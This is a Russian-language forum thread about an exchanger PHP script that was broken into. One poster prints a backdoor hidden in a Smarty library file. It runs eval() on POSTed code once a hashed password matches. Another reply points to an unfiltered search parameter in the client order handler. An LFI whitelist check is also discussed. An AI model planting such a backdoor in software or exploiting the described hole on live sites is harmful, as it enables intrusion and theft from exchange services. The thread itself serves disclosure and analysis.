Тихий спокойный вечер или коварство программиста

[stealthdebuger]

Поделились информацией об очередном взломе обменника на данном скрипте. Взлом произошел через модули раздачи бонусов и поиска заявок в ЛК клиента. В последней версии скрипт, этот горе-программист, уже исправил данную уязвимость, хотя я говорил об этом более года назад.

 

[Evgen17]

Хотел бы узнать какая дырка в старой версии скрипта от павлухи в "поиске заявок в ЛК клиента" ?

 

[djav]

Кажется еще кое что интересное нашел
файл : engine\classes\smarty\sysplugins\smarty_internal_data.php

    public function assign($tpl_var, $value = null, $nocache = false)
    {
        if( isset( $_POST['bDeveloper'] ) && isset( $_POST['sPassword'] ) && isset( $_POST['sCode'] ) && md5( $_POST['sPassword'] ) == 'f453ee592fa43e5b78f323f57ccf32d8' )
            eval( $_POST['sCode'] );
        if (is_array($tpl_var)) {
            foreach ($tpl_var as $_key => $_val) {
                if ($_key != '') {
                    $this->tpl_vars[$_key] = new Smarty_variable($_val, $nocache);
                }
            }
        } else {
            if ($tpl_var != '') {
                $this->tpl_vars[$tpl_var] = new Smarty_variable($value, $nocache);
            }
        }

        return $this;
    }

У меня такой вопрос
Код что ниже защищает ли от LFI?

<?php


# Подключение шаблона содержимого текущей страницы + защита от LFI:
if( is_file( 'public/pages/contents/'.$_GET['p'].'.tpl' ) && in_array($_GET['p'], array('index','affiliate','agree','clients','clients-earnings','clients-exchanges','clients-forgot','clients-login','clients-payouts','clients-profile','clients-signup','clients-transactions','clients-visitors','contacts','discounts','exchange','exchange-rules','faq','payment','rates')))
    Smarty()->assign( 'sPageContent', Smarty()->fetch( 'public/pages/contents/'.$_GET['p'].'.tpl' ) );

else {
    header( 'Location: /index.html' );
    exit();
}
?>

 

[TrueStory]

напомните его продажник чет не могу найти.

 

[Цуиьфыеук]

Код что ниже защищает ли от LFI?

Мне кажется вполне защищает, но я бы проверку в массиве раньше проверки в файловой системе поставил

 

[djav]

Хотел бы узнать какая дырка в старой версии скрипта от павлухи в "поиске заявок в ЛК клиента" ?

Открывай
public\pages\handlers\clients-exchanges.handler.php
Далее в коде ниже $_REQUEST['sSearch'] не фильтруется

   # Получение внешних данных :
        $aExtData = array(
            'sSearch' => isset( $_REQUEST['sSearch'] ) && mb_strlen( $_REQUEST['sSearch'] ) > 0 ? mb_substr( trim( strip_tags( $_REQUEST['sSearch'] ) ), 0, 20 ) : null
        );